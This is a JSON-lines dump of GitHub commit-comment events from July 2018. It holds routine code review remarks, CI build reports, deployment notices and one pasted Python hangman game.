{"id":"7908776528","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/crowdin-maven-plugin"},"payload":{"comment":{"id":29571755,"position":49,"line":49,"path":"src/main/java/org/digitalmediaserver/crowdin/configuration/PathPlaceholder.java","commit_id":"ba4177f3419951ddb0796f305fa02cb28b13afe1","created_at":"2018-07-02T20:29:49Z","updated_at":"2018-07-02T20:29:49Z","author_association":"CONTRIBUTOR","body":"The text comes from the Crowdin API documentation."}},"created_at":"2018-07-02T20:29:49Z"}
{"id":"7908778522","type":"CommitCommentEvent","actor":{"login":"joviane"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt7"},"payload":{"comment":{"id":29571765,"position":25,"line":25,"path":"CSharpPT7/ListaDeContas.cs","commit_id":"4b6c3b869718ccd87bae87511af53d04debfa70b","created_at":"2018-07-02T20:30:16Z","updated_at":"2018-07-02T20:30:16Z","author_association":"NONE","body":"Poderia falar de passar no construtor o tamanho necessário também ao invés de inicializar com 5."}},"created_at":"2018-07-02T20:30:16Z"}
{"id":"7908782813","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29571779,"position":null,"line":null,"path":null,"commit_id":"b437310e43043b6f56551f474e88dc01933317a8","created_at":"2018-07-02T20:31:10Z","updated_at":"2018-07-02T20:31:10Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-child](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-child).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-child-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-02T20:31:10Z"}
{"id":"7908783101","type":"CommitCommentEvent","actor":{"login":"jannekalliola"},"repo":{"name":"MichMich/MagicMirror"},"payload":{"comment":{"id":29571780,"position":null,"line":null,"path":null,"commit_id":"0e2e8d2e2aca2f8d0f1f2eb7b213577fcc4f623a","created_at":"2018-07-02T20:31:13Z","updated_at":"2018-07-02T20:31:13Z","author_association":"CONTRIBUTOR","body":"https://github.com/MichMich/MagicMirror/pull/1341"}},"created_at":"2018-07-02T20:31:13Z"}
{"id":"7908783372","type":"CommitCommentEvent","actor":{"login":"saschamarkus"},"repo":{"name":"saschamarkus/whisperback"},"payload":{"comment":{"id":29571781,"position":19,"line":161,"path":"whisperBack/whisperback.py","commit_id":"6c16e41e25ce1aba051b00557434050a26318d63","created_at":"2018-07-02T20:31:16Z","updated_at":"2018-07-02T20:31:16Z","author_association":"OWNER","body":"We need to apply the hardware sanitize to each line. And because of #15468 get rid of --\r\nSo it would be something like\r\n```\r\n        for k, v in debug_info.items():\r\n            result.append('======= content of {} =======\\n'.format(k))\r\n            try:\r\n                result.extend(list(filter(lambda x: re.sub(r'^--\\s*', '',  x) , v)))\r\n            except TypeError:\r\n                result.append(v)\r\n            return '\\n'.join(list(filter(lambda x: whisperBack.utils.sanitize_hardware_info(x)result)\r\n```\r\nThis is pythonic but I find it a harder to read. What do you think?"}},"created_at":"2018-07-02T20:31:16Z"}
{"id":"7908785418","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"furqanbaqai/FundsSplitter"},"payload":{"comment":{"id":29571794,"position":70,"line":43,"path":"contracts/FundsSplitter.sol","commit_id":"e083cffc4ca951138c62b33acb9343110a04b00a","created_at":"2018-07-02T20:31:40Z","updated_at":"2018-07-02T20:31:40Z","author_association":"NONE","body":"Then, a transfer here. \r\n\r\nI think you're not sure what to do? There are a lot of important lessons in this contract. Let's break it down a little. \r\n\r\nYou can't do these `send` and `transfers` here. But, you did the accounting, so you can add a new `function withdrawFunds() ... ` that bob and carol can use to claim their money. \r\n\r\nYou should always use `transfer` instead of `if(!addr.send(amount)) revert();` assuming you always want the original transaction to revert in case a receiver does not accept funds at some step and you almost always want to do that. \r\n\r\nOn those rare occasions when you want to continue processing, `send` should always be checked. Consider `bool result = addr.send(amount)` and it might be `false` if the contract still has the money. "}},"created_at":"2018-07-02T20:31:40Z"}
{"id":"7908785676","type":"CommitCommentEvent","actor":{"login":"joviane"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt7"},"payload":{"comment":{"id":29571795,"position":10,"line":10,"path":"CSharpPT7/Program.cs","commit_id":"4b6c3b869718ccd87bae87511af53d04debfa70b","created_at":"2018-07-02T20:31:43Z","updated_at":"2018-07-02T20:31:43Z","author_association":"NONE","body":"No curso mesmo esta classe não vai ficar assim né? Você vai criando cada coisa separada né e deixando a classe limpa? Do jeito que está tem muita coisa junta"}},"created_at":"2018-07-02T20:31:43Z"}
{"id":"7908789472","type":"CommitCommentEvent","actor":{"login":"joviane"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt7"},"payload":{"comment":{"id":29571808,"position":19,"line":19,"path":"CSharpPT7/Program.cs","commit_id":"4b6c3b869718ccd87bae87511af53d04debfa70b","created_at":"2018-07-02T20:32:34Z","updated_at":"2018-07-02T20:32:34Z","author_association":"NONE","body":"Seguindo ainda o comentário de muita coisa junta... Acho que cada método destes poderia ser direto no `Main`..."}},"created_at":"2018-07-02T20:32:34Z"}
{"id":"7908790024","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29571809,"position":null,"line":null,"path":null,"commit_id":"57d18d847e8c6fca974107dfc6e2da7d2528a3b2","created_at":"2018-07-02T20:32:41Z","updated_at":"2018-07-02T20:32:41Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2305 of 2305 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57d18d847e8c6fca974107dfc6e2da7d2528a3b2-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57d18d847e8c6fca974107dfc6e2da7d2528a3b2-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57d18d847e8c6fca974107dfc6e2da7d2528a3b2-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.png)</a>\n"}},"created_at":"2018-07-02T20:32:41Z"}
{"id":"7908791812","type":"CommitCommentEvent","actor":{"login":"h2mch"},"repo":{"name":"web3j/web3j-maven-plugin"},"payload":{"comment":{"id":29571816,"position":null,"line":null,"path":null,"commit_id":"72e692baa9986cf496f0595ea96d638290265ab2","created_at":"2018-07-02T20:33:06Z","updated_at":"2018-07-02T20:33:06Z","author_association":"COLLABORATOR","body":"the macos binary for version 0.4.23 was broken. After a newer version of solcj was released (0.4.24) I could update too"}},"created_at":"2018-07-02T20:33:06Z"}
{"id":"7908792686","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/coverxygen"},"payload":{"comment":{"id":29571819,"position":null,"line":null,"path":null,"commit_id":"61ede0960015702bc765a0c9c8eafad1c85c3c7f","created_at":"2018-07-02T20:33:17Z","updated_at":"2018-07-02T20:33:17Z","author_association":"OWNER","body":"Automatic build report for commit 61ede0960015702bc765a0c9c8eafad1c85c3c7f:\n\n[![Unit Tests](https://img.shields.io/badge/unittests-12%20/%2012-brightgreen.svg)](#)\n[![PyLint](https://img.shields.io/badge/pylint-failure-lightgrey.svg)](#)\n"}},"created_at":"2018-07-02T20:33:17Z"}
{"id":"7908795554","type":"CommitCommentEvent","actor":{"login":"GARENFEATHER"},"repo":{"name":"starkandwayne/ghost-for-cloudfoundry"},"payload":{"comment":{"id":29571826,"position":29,"line":156,"path":"bin/setup_and_run.sh","commit_id":"95cf5a4de7de27510375eae6fa46d3ba14be7989","created_at":"2018-07-02T20:33:56Z","updated_at":"2018-07-02T20:33:56Z","author_association":"NONE","body":"2018-07-02T13:07:32.09-0700 [APP/PROC/WEB/0] ERR ERROR: 1146 (42S02): Table 'ad_b09e1a2404eea03.migrations_lock' doesn't exist"}},"created_at":"2018-07-02T20:33:56Z"}
{"id":"7908796164","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29571828,"position":null,"line":null,"path":null,"commit_id":"57d18d847e8c6fca974107dfc6e2da7d2528a3b2","created_at":"2018-07-02T20:34:05Z","updated_at":"2018-07-02T20:34:05Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57d18d847e8c6fca974107dfc6e2da7d2528a3b2-PR6728-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-02T20:34:05Z"}
{"id":"7908797375","type":"CommitCommentEvent","actor":{"login":"zmonteca"},"repo":{"name":"GuloSolutions/up4-personalization"},"payload":{"comment":{"id":29571831,"position":null,"line":null,"path":null,"commit_id":"2f0050caeff35faaf468617a6c9fba5f1d982a2f","created_at":"2018-07-02T20:34:19Z","updated_at":"2018-07-02T20:34:19Z","author_association":"CONTRIBUTOR","body":"@RadBoris just as a general formatting thing, CONST should always be listed first in your class declaration. The reason is so that people can spot them quickly and easily."}},"created_at":"2018-07-02T20:34:19Z"}
{"id":"7908797596","type":"CommitCommentEvent","actor":{"login":"jadaml"},"repo":{"name":"jadaml/Enhancer.NET"},"payload":{"comment":{"id":29571834,"position":26,"line":26,"path":"Enhancer.Extensions/FancyFormatProvider.cs","commit_id":"2747e7794a00aabd2810ffbc9dc85d86e73df6f6","created_at":"2018-07-02T20:34:21Z","updated_at":"2018-07-02T20:34:21Z","author_association":"OWNER","body":"Whoops, this wasn't supposed to remain in this namespace."}},"created_at":"2018-07-02T20:34:21Z"}
{"id":"7908798584","type":"CommitCommentEvent","actor":{"login":"zmonteca"},"repo":{"name":"GuloSolutions/up4-personalization"},"payload":{"comment":{"id":29571836,"position":null,"line":null,"path":null,"commit_id":"5675c234ec3e294417bc7f0e212ed630ea4f209d","created_at":"2018-07-02T20:34:35Z","updated_at":"2018-07-02T20:34:35Z","author_association":"CONTRIBUTOR","body":"@RadBoris doh!"}},"created_at":"2018-07-02T20:34:35Z"}
{"id":"7908799632","type":"CommitCommentEvent","actor":{"login":"joviane"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt7"},"payload":{"comment":{"id":29571841,"position":168,"line":168,"path":"CSharpPT7/Program.cs","commit_id":"4b6c3b869718ccd87bae87511af53d04debfa70b","created_at":"2018-07-02T20:34:50Z","updated_at":"2018-07-02T20:34:50Z","author_association":"NONE","body":"Chama de `conta` mesmo onde está `item`"}},"created_at":"2018-07-02T20:34:50Z"}
{"id":"7908801987","type":"CommitCommentEvent","actor":{"login":"caghandemir"},"repo":{"name":"noahc3/auto-h-encore"},"payload":{"comment":{"id":29571845,"position":null,"line":null,"path":null,"commit_id":"fea97adf6fec2a5ec485f98f469b0872ec4fa73d","created_at":"2018-07-02T20:35:23Z","updated_at":"2018-07-02T20:35:23Z","author_association":"NONE","body":"Therefore, two issues down. Great work, thank you very much. "}},"created_at":"2018-07-02T20:35:23Z"}
{"id":"7908803822","type":"CommitCommentEvent","actor":{"login":"zmonteca"},"repo":{"name":"GuloSolutions/up4-personalization"},"payload":{"comment":{"id":29571848,"position":null,"line":null,"path":null,"commit_id":"54731418ffc7b71d61f3ca673038fd3a9c2ce89b","created_at":"2018-07-02T20:35:46Z","updated_at":"2018-07-02T20:35:46Z","author_association":"CONTRIBUTOR","body":"@RadBoris nice!"}},"created_at":"2018-07-02T20:35:46Z"}
{"id":"7908806226","type":"CommitCommentEvent","actor":{"login":"joviane"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt7"},"payload":{"comment":{"id":29571854,"position":40,"line":40,"path":"CSharpPT7/Program.cs","commit_id":"4b6c3b869718ccd87bae87511af53d04debfa70b","created_at":"2018-07-02T20:36:18Z","updated_at":"2018-07-02T20:36:18Z","author_association":"NONE","body":"Faz também usando o índice direto que nem no exemplo do array de idades e depois mostra o Array initializer"}},"created_at":"2018-07-02T20:36:18Z"}
{"id":"7908812423","type":"CommitCommentEvent","actor":{"login":"justinschoeman"},"repo":{"name":"rogerclarkmelbourne/Arduino_STM32"},"payload":{"comment":{"id":29571870,"position":null,"line":null,"path":null,"commit_id":"85eb51aacb3b6ceaf1575112cd363eb9d3a4649b","created_at":"2018-07-02T20:37:38Z","updated_at":"2018-07-02T20:37:38Z","author_association":"NONE","body":"This patch breaks the delay(ms) function. One loop is only a part of a millisecond - so this will always delay up to 1 ms less than required."}},"created_at":"2018-07-02T20:37:38Z"}
{"id":"7908812559","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29571871,"position":null,"line":null,"path":null,"commit_id":"8ae7c9b6c0420848c1b580c82212160ac6494dd6","created_at":"2018-07-02T20:37:40Z","updated_at":"2018-07-02T20:37:40Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-38](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-38).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-38-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-02T20:37:40Z"}
{"id":"7908814200","type":"CommitCommentEvent","actor":{"login":"GMagician"},"repo":{"name":"MarlinFirmware/Marlin"},"payload":{"comment":{"id":29571873,"position":9,"line":282,"path":"Marlin/src/inc/SanityCheck.h","commit_id":"262ef6def7fa76c8941d19294f823ab2e7e9d526","created_at":"2018-07-02T20:38:02Z","updated_at":"2018-07-02T20:38:02Z","author_association":"CONTRIBUTOR","body":"you are right, copy & paste issue ;-)"}},"created_at":"2018-07-02T20:38:02Z"}
{"id":"7908820592","type":"CommitCommentEvent","actor":{"login":"DavidTanner"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":29571886,"position":15,"line":77,"path":"spring-beans/src/main/java/org/springframework/beans/factory/support/DefaultSingletonBeanRegistry.java","commit_id":"8a56db6e4ebc2db71fc0524bbeea22b7acae7d2a","created_at":"2018-07-02T20:39:25Z","updated_at":"2018-07-02T20:39:25Z","author_association":"NONE","body":"Yes, it was. I didn't realize the core was at 6,and Finchley set the rest to 7"}},"created_at":"2018-07-02T20:39:25Z"}
{"id":"7908830429","type":"CommitCommentEvent","actor":{"login":"kurenai-ryu"},"repo":{"name":"kurenai-ryu/pyzk"},"payload":{"comment":{"id":29571920,"position":null,"line":null,"path":null,"commit_id":"66448cef1811376fa510f6126fb8a4c958f794ca","created_at":"2018-07-02T20:41:39Z","updated_at":"2018-07-02T20:41:39Z","author_association":"OWNER","body":"sadly the captured packets doesn't show any valid/corrupted communication, please redo the test and the capture, with -v (verbose mode) to compare captured data with recieved data (this is probably a data size error somewhere...)"}},"created_at":"2018-07-02T20:41:39Z"}
{"id":"7908836543","type":"CommitCommentEvent","actor":{"login":"flyinghead"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29571929,"position":null,"line":null,"path":null,"commit_id":"295395c680402978cc61f42aa0e156dd59df3b79","created_at":"2018-07-02T20:42:59Z","updated_at":"2018-07-02T20:42:59Z","author_association":"OWNER","body":"The log2 depth scaling (specifically gl_FragDepth) already requires OpenGL 3.x. Flat shading has no additional requirement."}},"created_at":"2018-07-02T20:42:59Z"}
{"id":"7908837027","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/d8train"},"payload":{"comment":{"id":29571931,"position":null,"line":null,"path":null,"commit_id":"fc737d6e88bc1acb9b5b35e8128a5f3b8539ed2e","created_at":"2018-07-02T20:43:07Z","updated_at":"2018-07-02T20:43:07Z","author_association":"MEMBER","body":"[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-3-d8train.pantheonsite.io/)\n\nCreated multidev environment [pr-3](https://dashboard.pantheon.io/sites/87e352d4-b22d-49b9-92d4-3fdda5d30ad2#pr-3) for d8train."}},"created_at":"2018-07-02T20:43:07Z"}
{"id":"7908839136","type":"CommitCommentEvent","actor":{"login":"aardappel"},"repo":{"name":"google/flatbuffers"},"payload":{"comment":{"id":29571937,"position":null,"line":null,"path":null,"commit_id":"a2fe49b498955bc70c0cafc037a2ccd8b1b843d0","created_at":"2018-07-02T20:43:33Z","updated_at":"2018-07-02T20:43:33Z","author_association":"COLLABORATOR","body":"As a workaround you can add your copyright notice to the first table?\r\n\r\nIt'd be easy to add a doc comment to `namespace`, if you want to make a PR.\r\n\r\nBtw I don't understand why you'd want to add a copyright to generated files."}},"created_at":"2018-07-02T20:43:33Z"}
{"id":"7908840102","type":"CommitCommentEvent","actor":{"login":"Rian501"},"repo":{"name":"Crashofthemoons/product-ordering"},"payload":{"comment":{"id":29571942,"position":null,"line":null,"path":null,"commit_id":"44ccc983522c2e7c95d4e411d717d1ad075b2be3","created_at":"2018-07-02T20:43:45Z","updated_at":"2018-07-02T20:43:45Z","author_association":"NONE","body":"I'm having trouble getting grunt to run on this one too!\r\n\r\nthis is the error I am seeing:\r\n```\r\nLoading \"eslint.js\" tasks...ERROR\r\n>> Error: Cannot find module 'acorn'\r\nLoading \"browserify.js\" tasks...ERROR\r\n>> Error: Cannot find module 'acorn'\r\n```"}},"created_at":"2018-07-02T20:43:45Z"}
{"id":"7908840403","type":"CommitCommentEvent","actor":{"login":"pelwell"},"repo":{"name":"raspberrypi/linux"},"payload":{"comment":{"id":29571943,"position":null,"line":null,"path":null,"commit_id":"9b796ffcd16dfaf820ecc6a9dc287e6d758a556e","created_at":"2018-07-02T20:43:48Z","updated_at":"2018-07-02T20:43:48Z","author_association":"CONTRIBUTOR","body":"That kind of runtime error is unlikely to be as a result of a Device Tree setting. It is more likely to be power-related, or more generic USB issue.\r\n\r\nAt this point I suggest you open a proper issue. The support available is going to be limited for such a specialised configuration, but there may be some USB settings that could help. You should also check that `vcgencmd get_throttled` returns 0 to rule out a power supply problem."}},"created_at":"2018-07-02T20:43:48Z"}
{"id":"7908843103","type":"CommitCommentEvent","actor":{"login":"CarmenAlva"},"repo":{"name":"Chicoritos/jueguito"},"payload":{"comment":{"id":29571951,"position":null,"line":null,"path":null,"commit_id":"78269110282aeaec768011e62796c91bfbafd599","created_at":"2018-07-02T20:44:23Z","updated_at":"2018-07-02T20:44:23Z","author_association":"NONE","body":"from random import randrange\r\nfrom Tkinter import *\r\nimport sys\r\n\r\n# -------------------------------------------------------------------\r\n# -------------------------------------------------------------------\r\n#                             JUEGO DEL AHORCADO\r\n#              JHON ALEXANDER CAMACHO URDINOLA - 4020001901\r\n#                         LABORATORIO DE LENGUAJES II\r\n#\t\t    PONTIFICIA UNIVERSIDAD JAVERIANA CALI\r\n#                                COLOMBIA\r\n#                           jhacu1@hotmail.com\r\n# -------------------------------------------------------------------\r\n# -------------------------------------------------------------------\r\n\r\ndef dibujar_muneco(opcion):\r\n    if opcion == 1:\r\n        # CREAR EL YUGO\r\n        C.create_line(580, 150, 580, 320, width=4, fill=\"blue\")\r\n        # CREAR LA CABEZA\r\n        C.create_oval(510, 150, 560, 200, width=2, fill='PeachPuff')\r\n\r\n    if opcion == 2:\r\n        # CREAR EL TRONCO\r\n        C.create_line(535, 200, 535, 290, width=2)\r\n\r\n    if opcion == 3:\r\n        # CREAR LA PIERNA IZQUIERDA\r\n        C.create_line(535, 290, 510, 320, 500, 320, width=2)\r\n\r\n    if opcion == 4:\r\n        # CREAR LA PIERNA DERECHA\r\n        C.create_line(535, 290, 560, 320, 550, 320, width=2)\r\n\r\n    if opcion == 5:\r\n        # CREAR LA MANO IZQUIERDA\r\n        C.create_line(535, 230, 510, 250, 500, 250, width=2)\r\n\r\n    if opcion == 6:\r\n        # CREAR LA MANO DERECHA\r\n        C.create_line(535, 230, 560, 250, 550, 270, width=2)\r\n\r\n    if opcion == 7:\r\n        # CREAR LA SOGA\r\n        C.create_line(510, 210, 580, 210,width=4, fill=\"blue\")\r\n\r\n\r\ndef obtener_palabra():\r\n    global adivinar, oportunidades, fin_juego, numerradas, palabra, digitadas\r\n    \r\n    # APERTURA DEL ARCHIVO DE PALABRAS (117 PA�SES)\r\n    # SOLO LECTURA\r\n    try:\r\n\tfp = open (\"C:\\Mis documentos\\LabLeng II\\Pa�ses.txt\",\"r\")\r\n    except IOError:\r\n\tprint \"NO SE PUDO ABRIR EL ARCHIVO. VERIFIQUE EL PATH O SI EL ARCHIVO EXISTE\"\r\n\tsys.exit()\r\n    \r\n    # OBTENCI�N DE UN N�MERO ALEATORIO.\r\n    num = randrange(1,118,1)\r\n\r\n    # ADIVINAR ES LA PALABRA QUE SE VA A TOMAR DEL ARCHIVO DE PALABRAS Y QUE\r\n    # EL USUARIO DEBE ADIVINAR.\r\n    for i in range (1,118,1):\r\n        if i == num:\r\n            adivinar = (fp.readline()).split(\" \")\r\n        else:\r\n            fp.readline()\r\n    fp.close()\r\n\r\n    # LISTA MOSTRADA EN PANTALLA PARA LA PALABRA A ENCONTRAR\r\n    palabra = [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"]\r\n\r\n    # LISTA CON LAS LETRAS ERRADAS DIGITADAS POR EL USUARIO\r\n    digitadas = [\" \", \" \", \" \", \" \", \" \", \" \", \" \"]\r\n\r\n    #VARIABLES DEL JUEGO\r\n    oportunidades = 7\r\n    fin_juego = 0\r\n    # N�MERO DE LETRAS ERRADAS DIGITADAS\r\n    numerradas = 0\r\n\r\n    i = 0\r\n    while i<len(adivinar) - 1:\r\n\tpalabra[i] = '_'\r\n\ti = i + 1\r\n\r\n    # J: PARA COLOCAR LA LETRA J PIXELES A LA DERECHA.\r\n    i = 0\r\n    j = 0 \r\n    while i<len(adivinar) - 1:\r\n        C.create_text(50 + j, 200, text = palabra[i], font='Times', fill='blue')\r\n        j = j + 20\r\n        i = i + 1\r\n   \r\n\r\ndef ahorcado():\r\n    global letra, oportunidades, adivinar, fin_juego, numerradas, palabra, digitadas\r\n    \r\n    i = 0\r\n    contar_letras = 0\r\n    while i<len(adivinar) - 1:\r\n\tif adivinar[i] == letra.get():\r\n\t    palabra[i] = letra.get()\r\n\t    contar_letras = 1\r\n\ti = i + 1\r\n\r\n    if contar_letras == 0:\r\n\toportunidades = oportunidades - 1\r\n\tdigitadas[numerradas] = letra.get()\r\n\tnumerradas = numerradas + 1\r\n\t    \r\n    i = 0\r\n    j = 0 \r\n    while i<len(palabra) - 1:\r\n\tC.create_text(50 + j, 200, text = palabra[i], font='Times', fill='blue')\r\n\tj = j + 20\r\n\ti = i + 1\r\n\r\n    i = 0\r\n    j = 0 \r\n    while i<len(digitadas) - 1:\r\n\tC.create_text(50 + j, 320, text=digitadas[i], font='Times', fill='blue')\r\n\tj = j + 20\r\n\ti = i + 1\r\n\r\n    if numerradas == 1:\r\n        dibujar_muneco(1)\r\n    if numerradas == 2:\r\n        dibujar_muneco(2)\r\n    if numerradas == 3:\r\n        dibujar_muneco(3)\r\n    if numerradas == 4:\r\n        dibujar_muneco(4)\r\n    if numerradas == 5:\r\n        dibujar_muneco(5)\r\n    if numerradas == 6:\r\n        dibujar_muneco(6)\r\n    if numerradas == 7:\r\n        dibujar_muneco(7)\r\n        \r\n    # VERIFICAR SI PERDI�\r\n    if oportunidades == 0:\r\n        C.create_text(75, 370, text=\"PERDISTE\", font='Times 10 bold', fill='blue')\r\n        C.create_text(100, 400, text=\"LA PALABRA ERA\", font='Times 10 bold', fill='blue')\r\n        i = 0\r\n        j = 0 \r\n        while i<len(adivinar) - 1:\r\n            C.create_text(50 + j, 420, text=adivinar[i], font='Times 10 bold', fill='blue')\r\n            j = j + 20\r\n            i = i + 1\r\n        boton.tkButtonLeave()\r\n\r\n    # VERIFICAR SI GAN�\r\n    i = 0\r\n    lleno = 0\r\n    while i < len(palabra) - 1:\r\n        if palabra[i] != '_':\r\n            lleno = lleno + 1\r\n        i = i + 1\r\n    \r\n    if lleno == len(palabra) - 1:\r\n        C.create_text(75, 370, text=\"ADIVINO!!!\", font='Times 10 bold', fill='blue')\r\n        boton.tkButtonLeave()\r\n\r\n    entrada.delete(0,END)\r\n\r\n        \r\n\r\n# -------------------------------------------------------------------\r\n#                                JUEGO\r\n# -------------------------------------------------------------------\r\n\r\nroot = Tk()\r\ntex1 = 'JUEGO DEL AHORCADO\\nPAISES DEL MUNDO\\nREALIZADO POR\\nJHON ALEXANDER CAMACHO'\r\ntex2 = '\\n\\nA B C D E F G H I J K L M N O P Q R S T U V W X Y Z'\r\nC = Canvas(root, width=600, height=450, background='LightYellow')\r\nC.create_text(300, 70, justify='center', text=tex1+tex2, font='Times 10 bold', fill='blue')\r\n\r\n# ELEMENTOS A COLOCAR EN EL CANVAS\r\n\r\nletra = StringVar()\r\nsolicitud = Label(root, text=\"DIGITE UNA LETRA: \")\r\nentrada = Entry(root, textvariable = letra)\r\nboton = Button(root, text = \" J U G A R \", command = ahorcado, width=20)\r\nbotonsalida = Button(root, text = \"S A L I R\", command=C.quit, width=20)\r\nC.grid(row=1, column=1, columnspan=4)\r\nsolicitud.grid(row=2, column=1)\r\nentrada.grid(row=2, column=2)\r\nboton.grid(row=2, column=3)\r\nbotonsalida.grid(row=2, column=4)\r\n\r\n# SE OBTIENE LA PALABRA A ADIVINAR\r\nobtener_palabra()\r\n\r\nroot.mainloop()\r\n"}},"created_at":"2018-07-02T20:44:23Z"}
{"id":"7908843308","type":"CommitCommentEvent","actor":{"login":"mapx-"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29571952,"position":null,"line":null,"path":null,"commit_id":"1883b2e383c6ca691950e516d140e05cdf001088","created_at":"2018-07-02T20:44:25Z","updated_at":"2018-07-02T20:44:25Z","author_association":"CONTRIBUTOR","body":"https://github.com/uBlockOrigin/uAssets/commit/c2f78df5d5e3e164bbc0082fbe9195f91ef4f608"}},"created_at":"2018-07-02T20:44:25Z"}
{"id":"7908846569","type":"CommitCommentEvent","actor":{"login":"drnic"},"repo":{"name":"starkandwayne/ghost-for-cloudfoundry"},"payload":{"comment":{"id":29571961,"position":29,"line":156,"path":"bin/setup_and_run.sh","commit_id":"95cf5a4de7de27510375eae6fa46d3ba14be7989","created_at":"2018-07-02T20:45:06Z","updated_at":"2018-07-02T20:45:06Z","author_association":"MEMBER","body":"Hmm sorry I thought I tested this on a new DB. \r\n\r\nDoes this cause the app to fail startup or does it just look ugly in logs?"}},"created_at":"2018-07-02T20:45:06Z"}
{"id":"7908847720","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29571964,"position":null,"line":null,"path":null,"commit_id":"3b67299cba9377abb8d88441082da916cdee53f8","created_at":"2018-07-02T20:45:20Z","updated_at":"2018-07-02T20:45:20Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-388](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-388).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-388-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-02T20:45:20Z"}
{"id":"7908849924","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/coverxygen"},"payload":{"comment":{"id":29571966,"position":null,"line":null,"path":null,"commit_id":"5b16dc5ebef088889b26fc40d28e542bc65cb259","created_at":"2018-07-02T20:45:47Z","updated_at":"2018-07-02T20:45:47Z","author_association":"OWNER","body":"Automatic build report for commit 5b16dc5ebef088889b26fc40d28e542bc65cb259:\n\n[![Unit Tests](https://img.shields.io/badge/unittests-12%20/%2012-brightgreen.svg)](#)\n[![PyLint](https://img.shields.io/badge/pylint-failure-lightgrey.svg)](#)\n"}},"created_at":"2018-07-02T20:45:47Z"}
{"id":"7908851289","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/coverxygen"},"payload":{"comment":{"id":29571970,"position":null,"line":null,"path":null,"commit_id":"5b16dc5ebef088889b26fc40d28e542bc65cb259","created_at":"2018-07-02T20:46:07Z","updated_at":"2018-07-02T20:46:07Z","author_association":"OWNER","body":"Automatic build report for commit 5b16dc5ebef088889b26fc40d28e542bc65cb259:\n\n[![Unit Tests](https://img.shields.io/badge/unittests-12%20/%2012-brightgreen.svg)](#)\n[![PyLint](https://img.shields.io/badge/pylint-failure-lightgrey.svg)](#)\n"}},"created_at":"2018-07-02T20:46:07Z"}
